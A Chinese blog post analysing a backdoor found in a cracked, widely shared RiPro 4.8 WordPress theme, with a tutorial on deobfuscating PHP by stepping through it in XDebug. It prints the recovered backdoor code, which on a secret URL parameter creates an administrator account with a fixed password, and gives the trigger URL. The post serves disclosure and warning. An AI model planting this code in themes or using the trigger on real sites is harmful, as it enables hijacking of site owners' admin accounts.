網傳分享的Wordpressripro主題4.8版本後門分析_盾給網下載修復文件[建站教程]

關於最近網傳的日主題ripro4.8版本破解版的後門問題，源碼分享源頭不清楚，盾給網也是轉載免費分享，沒想到中了套路。所有在網絡上（無論是盾給源碼下載網或是其他網站）下載到ripro4.8源碼的朋友請好好閱讀此文章：

下載後用D盾掃描

發現有加密文件，用Notepad++查看

破解混淆加密後得到源文件

經查看發現後門代碼

01 02 03 04 05 06 07 08 09 10 11 12

add_action('wp_head', 'wp_backdoor'); function wp_backdoor() {         if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {                 require('wp-includes/registration.php');                 if (!username_exists('backdoor')) { //檢測是否存在backdoor賬戶                         $user_id = wp_create_user('backdoor', '123456'); //創建賬戶                         $user = new WP_User($user_id);                         $user->set_role('administrator'); //設置爲管理員權限                 }         } }

使用http(s)://你的域名/?backdoor=go訪問，
自動創建用戶名爲backdoor密碼爲123456的管理員賬戶
本地測試

成功登錄後臺

推薦這種涉及到支付的主題還是用正版，盜版的就如作者所說，很容易被添加後門。
畢竟沒有真正免費的午餐。

---

看到有人想要學習解密php混淆加密
使用工具：PHP7.2+XDebug+VSCode{必備插件[PHP Debug（XDebug調試）+PHP IntelliSense（代碼格式化）+Code Runner（快速運行php文件，方便調試）}
當然還有其他配置比如：XDebug安裝，Code Runner php文件路徑配置等，還是等下一次再出個php調試環境詳細配置教程吧。
原文件用VSCode打開是這樣的

先格式化（右鍵-格式化文檔，多格式化幾次）

保存，改編碼爲Western (Windows 1252)【本次解密非必須】

使用 Ctrl + Shift + P 打開快捷指令，輸入 encoding，選擇用 Change File Encoding，選擇 Reopen with Encoding，選擇 Western (Windows 1252)。

Windows 1252 是個單字節的字節集，不會出現任何 2 個字節被顯示成 1 個字符的問題，其他的單字節集通常也可以。 ——@Ganlv

創建PHP調試launch.json文件

默認配置就可以了，開始調試

運行PHP文件

單步調試(F11)

一直調試可以看見不停的給變量賦值解密函數

多運行幾步就會發現源碼直接出來了

比起Ganlv大神解密的zym/phpjm混淆解密還簡單，畢竟沒有反調試。
很適合新手入門破解,歡迎交流學習。

解密後的文件

藍奏盤：https://www.lanzous.com/i836ukh

後門代碼已註釋，位於412-423行

原文地址：http://www.dungei.com/8976.html